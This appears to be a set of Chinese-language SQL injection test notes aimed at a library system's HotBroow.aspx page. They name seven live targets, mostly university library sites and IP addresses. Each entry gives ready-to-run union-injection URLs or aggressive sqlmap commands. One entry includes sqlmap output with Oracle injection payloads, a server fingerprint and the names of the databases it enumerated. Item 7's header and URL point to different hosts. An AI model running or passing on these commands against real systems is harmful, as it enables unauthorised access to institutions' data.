测试案例:
【1】 http://222.77.99.242:8088/
0x01【Union注入测试】
http://222.77.99.242:8088/HotBroow.aspx?Call=TH'+union+all+select+NULL,'1111',NULL,'2222','3333',NULL,NULL+from+dual--
0x02【sqlmap注入】
python sqlmap.py -u 'http://222.77.99.242:8088/HotBroow.aspx?Call=TH' --level 5 --risk 3 --dbs -v 3 --batch --random-agent
---
Place: GET
Parameter: Call
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Call=TH%' AND 9722=9722 AND '%'='
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: Call=TH%' UNION ALL SELECT NULL,CHR(113)||CHR(115)||CHR(112)||CHR(114)||CHR(113)||CHR(111)||CHR(76)||CHR(117)||CHR(99)||C
LL,NULL FROM DUAL--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: Call=TH%' AND 3115=DBMS_PIPE.RECEIVE_MESSAGE(CHR(87)||CHR(101)||CHR(103)||CHR(78),5) AND '%'='
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Oracle
available databases [12]:
[*] CTXSYS
[*] EXFSYS
[*] FLOWS_FILES
[*] GDLISNET
[*] HR
[*] MDSYS
[*] OLAPSYS
[*] OUTLN
[*] SYSTEM
[*] TSMSYS
[*] WK_TEST
[*] WKSYS
【2】http://library.scac.edu.cn/jpweb/
python sqlmap.py -u 'http://library.scac.edu.cn/jpweb/HotBroow.aspx?Call=TH' --level 5 --risk 3 --dbs -v 3 --dbms oracle --batch --random-agent
【3】http://lib.cumtb.edu.cn/fsweb/
python sqlmap.py -u 'http://lib.cumtb.edu.cn/fsweb/HotBroow.aspx?Call=TH' --level 5 --risk 3 --dbs -v 3 --dbms oracle --batch --random-agent
【4】http://218.6.165.16/jpweb/
python sqlmap.py -u 'http://218.6.165.16/jpweb/HotBroow.aspx?Call=TH' --level 5 --risk 3 --dbs -v 3 --dbms oracle --batch --random-agent
【5】http://219.242.65.10/fsweb/
python sqlmap.py -u 'http://219.242.65.10/fsweb/HotBroow.aspx?Call=TH' --level 5 --risk 3 --dbs -v 3 --dbms oracle --batch --random-agent
【6】http://lib.xjnu.edu.cn:8000
http://lib.xjnu.edu.cn:8000/HotBroow.aspx?Call=TH'+union+all+select+NULL,'1111',NULL,'2222','3333',NULL,NULL+from+dual--
【7】http://218.195.208.165:8000
http://218.6.165.16/jpweb/HotBroow.aspx?Call=TH'+union+all+select+NULL,'1111',NULL,'2222','3333',NULL,NULL+from+dual--